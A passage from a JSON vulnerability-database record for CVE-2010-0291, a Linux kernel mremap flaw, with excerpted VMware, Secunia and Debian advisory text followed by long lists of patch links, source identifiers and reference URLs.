\n\n   ESXi 4.1\n   --------\n   ESXi410-201010401-SG\n   Download link: http://bit.ly/bb3xjV\n   md5sum: 05f1049c7a595481cd682e92fe8d3285\n   sha1sum: f6993c185f7d1cb971a4ae6e017e0246b8c25a76\n   http://kb.vmware.com/kb/1027753\n\n   ESX 4.1\n   -------\n   ESX410-201010001\n   Download link: http://bit.ly/a3Ffw8\n   md5sum: ff4435fd3c74764f064e047c6e5e7809\n   sha1sum: 322981f4dbb9e5913c8f38684369444ff7e265b3\n   http://kb.vmware.com/kb/1027027\n\n   ESX410-201010001 contains the following security bulletins:\n   ESX410-201010401-SG (COS kernel) | http://kb.vmware.com/kb/1027013\n   ESX410-201010419-SG (Likewise)   | http://kb.vmware.com/kb/1027026\n   ESX410-201010404-SG (NSS)        | http://kb.vmware.com/kb/1027016\n   ESX410-201010409-SG (tar)        | http://kb.vmware.com/kb/1027019\n   ESX410-201010412-SG (Perl)       | http://kb.vmware.com/kb/1027022\n   ESX410-201010413-SG (cpio)       | http://kb.vmware.com/kb/1027023\n   ESX410-201010410-SG (cURL)       | http://kb.vmware.com/kb/1027020\n   ESX410-201010401-SG (vmkernel64,\n                           VMX, CIM)| http://kb.vmware.com/kb/1027013\n   ESX410-201010414-SG\n             (vmware-esx-pam-config)| http://kb.vmware.com/kb/1027024\n   ESX410-201010402-SG (GnuTLS, NSS,\n                        and openSSL)| http://kb.vmware.com/kb/1027014\n\n   ESX410-201010001 also contains the following non-security bulletins\n   ESX410-201010405-BG ESX410-201010415-BG\n\n   To install an individual bulletin use esxupdate with the -b option. \n\nThe vulnerabilities are caused due to various problems related to\n\"do_mremap()\" and \"MREMAP_FIXED\", which can be exploited to e.g. \ncause a system crash on certain architectures. \n\nPROVIDED AND/OR DISCOVERED BY:\nDisclosed in GIT commits. \n\nORIGINAL ADVISORY:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.32.4\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n\nNote: Debian carefully tracks all known security issues across every\nlinux kernel package in all releases under active security support. \nHowever, given the high frequency at which low-severity security\nissues are discovered in the kernel and the resource requirements of\ndoing an update, updates for lower priority issues will normally not\nbe released for all kernels at the same time. Rather, they will be\nreleased in a staggered or \"leap-frog\" fashion",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0291"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001721"
      },
      {
        "db": "BID",
        "id": "37906"
      },
      {
        "db": "VULHUB",
        "id": "VHN-42896"
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-0291"
      },
      {
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "95883"
      },
      {
        "db": "PACKETSTORM",
        "id": "85423"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      }
    ],
    "trust": 2.61
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2010-0291",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "37906",
        "trust": 2.9
      },
      {
        "db": "SECUNIA",
        "id": "39033",
        "trust": 2.6
      },
      {
        "db": "SECUNIA",
        "id": "38492",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "43315",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "38229",
        "trust": 0.9
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001721",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-150",
        "trust": 0.7
      },
      {
        "db": "VULHUB",
        "id": "VHN-42896",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-0291",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "98419",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "86790",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "85958",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "95883",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "85423",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "86286",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42896"
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-0291"
      },
      {
        "db": "BID",
        "id": "37906"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001721"
      },
      {
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "95883"
      },
      {
        "db": "PACKETSTORM",
        "id": "85423"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-150"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0291"
      }
    ]
  },
  "id": "VAR-201001-0654",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42896"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T20:08:47.142000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "kernel-2.6.18-194.3.AXS3",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=1216"
      },
      {
        "title": "ChangeLog-2.6.32.4",
        "trust": 0.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.32.4"
      },
      {
        "title": "RHSA-2010:0161",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0161.html"
      },
      {
        "title": "RHSA-2010:0504",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0504.html"
      },
      {
        "title": "VMSA-2010-0016",
        "trust": 0.8,
        "url": "http://www.vmware.com/security/advisories/vmsa-2010-0016.html"
      },
      {
        "title": "VMSA-2011-0003",
        "trust": 0.8,
        "url": "http://www.vmware.com/security/advisories/vmsa-2011-0003.html"
      },
      {
        "title": "ChangeLog-2.6.32.4",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=2979"
      },
      {
        "title": "VMware Security Advisories: VMware ESX third party update for Service Console kernel",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=fc09ad2748a073df3195434d27659026"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-source-2.6.15 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-894-1"
      },
      {
        "title": "Debian Security Advisories: DSA-2005-1 linux-2.6.24 -- privilege escalation/denial of service/sensitive memory leak",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=730b40b3a3f2a9a1f3cba6257e5248fb"
      },
      {
        "title": "VMware Security Advisories: VMware ESXi and ESX third party updates for Service Console and Likewise components",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=d087ff2df978e84e36dbce58f6a59022"
      },
      {
        "title": "VMware Security Advisories: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=ea953b0a91a1816979ec1d304d5e3d93"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2010-0291"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001721"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-150"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-264",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42896"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001721"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0291"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.7,
        "url": "http://www.securityfocus.com/bid/37906"
      },
      {
        "trust": 2.6,
        "url": "http://secunia.com/advisories/39033"
      },
      {
        "trust": 2.1,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=556703"
      },
      {
        "trust": 2.0,
        "url": "http://marc.info/?l=linux-arch\u0026m=126004438008670\u0026w=2"
      },
      {
        "trust": 1.9,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.32.4"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/archive/1/516397/100/0/threaded"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/38492"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/43315"
      },
      {
        "trust": 1.8,
        "url": "http://www.debian.org/security/2010/dsa-1996"
      },
      {
        "trust": 1.8,
        "url": "http://www.debian.org/security/2010/dsa-2005"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0161.html"
      },
      {
        "trust": 1.8,
        "url": "http://groups.google.com/group/linux.kernel/msg/895f20870532241e"
      },
      {
        "trust": 1.8,
        "url": "http://groups.google.co.jp/group/fa.linux.kernel/browse_thread/thread/8bf22336b1082090"
      },
      {
        "trust": 1.8,
        "url": "http://www.vmware.com/security/advisories/vmsa-2011-0003.html"
      },
      {
        "trust": 1.8,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a11824"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=0067bd8a55862ac9dd212bd1c4f6f5bff1ca1301"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=05d72faa6d13c9d857478a5d35c85db9adada685"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=097eed103862f9c6a97f2e415e21d1134017b135"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=0ec62d290912bb4b989be7563851bc364ec73b56"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=1a0ef85f84feb13f07b604fcf5b90ef7c2b5c82f"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=2c6a10161d0b5fc047b5bd81b03693b9af99fab5"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=2ea1d13f64efdf49319e86c87d9ba38c30902782"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=54f5de709984bae0d31d823ff03de755f9dcac54"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=564b3bffc619dcbdd160de597b0547a7017ea010"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=570dcf2c15463842e384eb597a87c1e39bead99b"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=8c7b49b3ecd48923eb64ff57e07a1cdb74782970"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=9206de95b1ea68357996ec02be5db0638a0de2c1"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=935874141df839c706cd6cdc438e85eb69d1525e"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=aa65607373a4daf2010e8c3867b6317619f3c1a3"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=bb52d6694002b9d632bb355f64daa045c6293a4e"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=c4caa778157dbbf04116f0ac2111e389b5cd7a29"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=e77414e0aad6a1b063ba5e5750c582c75327ea6a"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=ecc1a8993751de4e82eb18640d631dae1f626bd6"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=f106af4e90eadd76cfc0b5325f659619e08fb762"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=f8b7256096a20436f6d0926747e3ac3d64c81d24"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=oss-security\u0026m=126396609004884\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=oss-security\u0026m=126396065732697\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=oss-security\u0026m=126406814304720\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=oss-security\u0026m=126395874130875\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=oss-security\u0026m=126400443123998\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=oss-security\u0026m=126388181420690\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=oss-security\u0026m=126399980216047\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=oss-security\u0026m=126393370931972\u0026w=2"
      },
      {
        "trust": 1.0,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0291"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-0291"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/38229"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0003"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0007"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0291"
      },
      {
        "trust": 0.3,
        "url": "http://www.linux.org/"
      },
      {
        "trust": 0.3,
        "url": "http://support.avaya.com/css/p8/documents/100092686"
      },
      {
        "trust": 0.3,
        "url": "http://www.ubuntu.com/usn/usn-894-1"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4308"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4536"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4538"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0415"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1088"
      },
      {
        "trust": 0.2,
        "url": "http://kb.vmware.com/kb/1055"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0307"
      },
      {
        "trust": 0.2,
        "url": "http://www.vmware.com/support/policies/eos_vi.html"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0415"
      },
      {
        "trust": 0.2,
        "url": "http://www.vmware.com/support/policies/eos.html"
      },
      {
        "trust": 0.2,
        "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1087"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0622"
      },
      {
        "trust": 0.2,
        "url": "http://www.vmware.com/support/policies/security_response.html"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1321"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1437"
      },
      {
        "trust": 0.2,
        "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4020"
      },
      {
        "trust": 0.2,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/"
      },
      {
        "trust": 0.2,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4138"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0622"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0410"
      },
      {
        "trust": 0.2,
        "url": "http://packages.debian.org/\u003cpkg\u003e"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4021"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0307"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=linux-arch\u0026amp;m=126004438008670\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=oss-security\u0026amp;m=126388181420690\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=oss-security\u0026amp;m=126393370931972\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=oss-security\u0026amp;m=126395874130875\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=oss-security\u0026amp;m=126396065732697\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=oss-security\u0026amp;m=126396609004884\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=oss-security\u0026amp;m=126399980216047\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=oss-security\u0026amp;m=126400443123998\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=oss-security\u0026amp;m=126406814304720\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/264.html"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=0067bd8a55862ac9dd212bd1c4f6f5bff1ca1301"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=935874141df839c706cd6cdc438e85eb69d1525e"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=aa65607373a4daf2010e8c3867b6317619f3c1a3"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=f8b7256096a20436f6d0926747e3ac3d64c81d24"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=0ec62d290912bb4b989be7563851bc364ec73b56"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=c4caa778157dbbf04116f0ac2111e389b5cd7a29"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=f106af4e90eadd76cfc0b5325f659619e08fb762"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=2c6a10161d0b5fc047b5bd81b03693b9af99fab5"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=9206de95b1ea68357996ec02be5db0638a0de2c1"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=8c7b49b3ecd48923eb64ff57e07a1cdb74782970"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=54f5de709984bae0d31d823ff03de755f9dcac54"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=1a0ef85f84feb13f07b604fcf5b90ef7c2b5c82f"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=097eed103862f9c6a97f2e415e21d1134017b135"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=e77414e0aad6a1b063ba5e5750c582c75327ea6a"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=05d72faa6d13c9d857478a5d35c85db9adada685"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=2ea1d13f64efdf49319e86c87d9ba38c30902782"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=ecc1a8993751de4e82eb18640d631dae1f626bd6"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=bb52d6694002b9d632bb355f64daa045c6293a4e"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=564b3bffc619dcbdd160de597b0547a7017ea010"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=570dcf2c15463842e384eb597a87c1e39bead99b"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.vmware.com/security/advisories/vmsa-2010-0017.html"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/894-1/"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3556"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0086"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0085"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1086"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0730"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027919"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2939"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/support/vsphere4/doc/vsp_esxi41_u1_rel_notes.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3571"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0095"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0092"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0093"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3555"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3548"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1031330"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3554"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3562"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0088"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0084"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0091"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0089"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3557"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3550"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0085"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1384"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3567"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0838"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0086"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0837"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3553"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0106"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2227"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0107"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2902"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2901"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/support/vsphere4/doc/vsp_esx41_u1_rel_notes.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1085"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0091"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0841"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0840"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2248"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3561"
      },
      {
        "trust": 0.1,
